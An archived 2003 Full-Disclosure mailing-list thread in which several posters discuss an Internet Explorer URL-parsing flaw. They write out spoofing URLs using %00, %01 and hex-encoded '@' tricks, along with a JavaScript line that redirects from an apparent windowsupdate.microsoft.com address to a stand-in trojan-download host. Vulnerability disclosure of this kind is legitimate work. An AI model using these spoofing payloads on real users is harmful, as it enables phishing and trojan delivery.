[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

To: <full-disclosure@lists.netsys.com>
Subject: RE: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
From: "Rainer Gerhards" <rgerhards@hq.adiscon.com>
Date: Wed, 10 Dec 2003 13:53:31 +0100

Well, 0x00 works even better (as usual). Consider the following URL:

http://www.microsoft.com:security%00@%77w%77%2elinu%78%2eorg

This, together with a little social engineering can do much. In my IE
6.0.2800.1106.xpsp2.03422-1633 this takes your to www.linux.org, which
is also shown in the address bar. The status bar will show
"www.microsoft.com:security" whenever you hover over relative links on
the site (check with the news). The trick will most probably work will
with fake sites that remove the address bar.

The 0x00 C string terminator causes often quite some troubles. I
remember reporting a similar problem to Microsoft some month ago, then
related to %00 not being correctly parsed by IIS. It was considered low
risk by Microsoft and not immediately addressed (I have to admit I
actually think this at least not very high risk...). It should be
addressed by now.

Back to the dicsussed topic: I think it is also not very clever to
display credentials in the status bar. So if somebody is dumb enough to
actually use URLs with credentials, I think the browser should remove
them in all visible elements.

Rainer Gerhards
Adiscon






________________________________

        From: VeNoMouS [mailto:venom@gen-x.co.nz] 
        Sent: Wednesday, December 10, 2003 6:03 AM
        To: Julian HO Thean Swee; full-disclosure@lists.netsys.com
        Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL
parsing vulnerability
        
        
        umm tested this you dont need %01 either btw.
         
        www.microsoft.com@www.linux.org
         
        was messing around with some hex stile as well is there a way to
call a file:// inside a http:// becos the issue with doing the @ trick
is it appends http:// automaticly, mind you , u could just make it exec
some vb code or something on a site, just a random idea any way
         
        and it dont also seem to work if you use hex as well for the
full domain ie
         
        www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67
         
                nor  www.microsoft.com%40www.linux.org
         
                where as if you
www.microsoft.com@%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 works
         
         
         
         
         
         
        ----- Original Message ----- 

                From: Julian HO Thean Swee <mailto:jho@starhub.com>  
                To: 'full-disclosure@lists.netsys.com' 
                Sent: Wednesday, December 10, 2003 4:22 PM
                Subject: [Full-Disclosure] RE: FWD: Internet Explorer
URL parsing vulnerability


                Hmm, it doesn't seem to work on my browser :) 
                I don't even get transported to any page when i click
the button. 
                But then again, i have everything turned off in the
internet zone by default... 
                (but my submit non-encrypted form data is on) 

                Does it really work then?  it looks like it's using
javascript...? (location.href) 
                Merry Christmas everyone :) 

                        --__--__-- 

                        Message: 1 
                        Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) 
                        From: S G Masood <sgmasood@yahoo.com> 
                        To: full-disclosure@lists.netsys.com 
                        Subject: [Full-Disclosure] RE: FWD: Internet
Explorer URL parsing vulnerability 


                        LOL. This is so simple and dangerous, it almost
made 
                        me laugh and cry at the same time. Most of you
will 
                        realise why...;D 
                        The Paypal, AOL, Visa, Mastercard, et al email 
                        scammers will have a harvest of gold this month
with 
                        lots of zombies falling for this simple
technique. 

                        ># POC ########## 
        
>http://www.zapthedingbat.com/security/ex01/vun1.htm 

                        Dont be surprised if your latest download from 
                        http://www.microsoft.com turns out to be a
trojan! 

        
location.href=unescape('http://windowsupdate.microsoft.com%01@comedownlo
adaneviltrojanfromme.com); 


                        -- 
                        S.G.Masood 

                        Hyderabad, 
                        India 

                        PS: One more thing - no scripting required to
exploit this. 

                        __________________________________ 
                        Do you Yahoo!? 
                        Free Pop-Up Blocker - Get it now 
                        http://companion.yahoo.com/ 


                This email is confidential and privileged.  If you are
not the intended recipient, you must not view, disseminate, use or copy
this email. Kindly notify the sender immediately, and delete this email
from your system. Thank you.

                Please visit our website at www.starhub.com 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- RE: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
  - From: Rainer Gerhards <rgerhards@hq.adiscon.com>

Prev by Date: [Full-Disclosure] Re: Internet Explorer URL parsing vulnerability
Next by Date: Re: [Full-Disclosure] Re: Internet Explorer URL parsing vulnerability
Previous by thread: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Next by thread: RE: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Index(es):
- Date
- Thread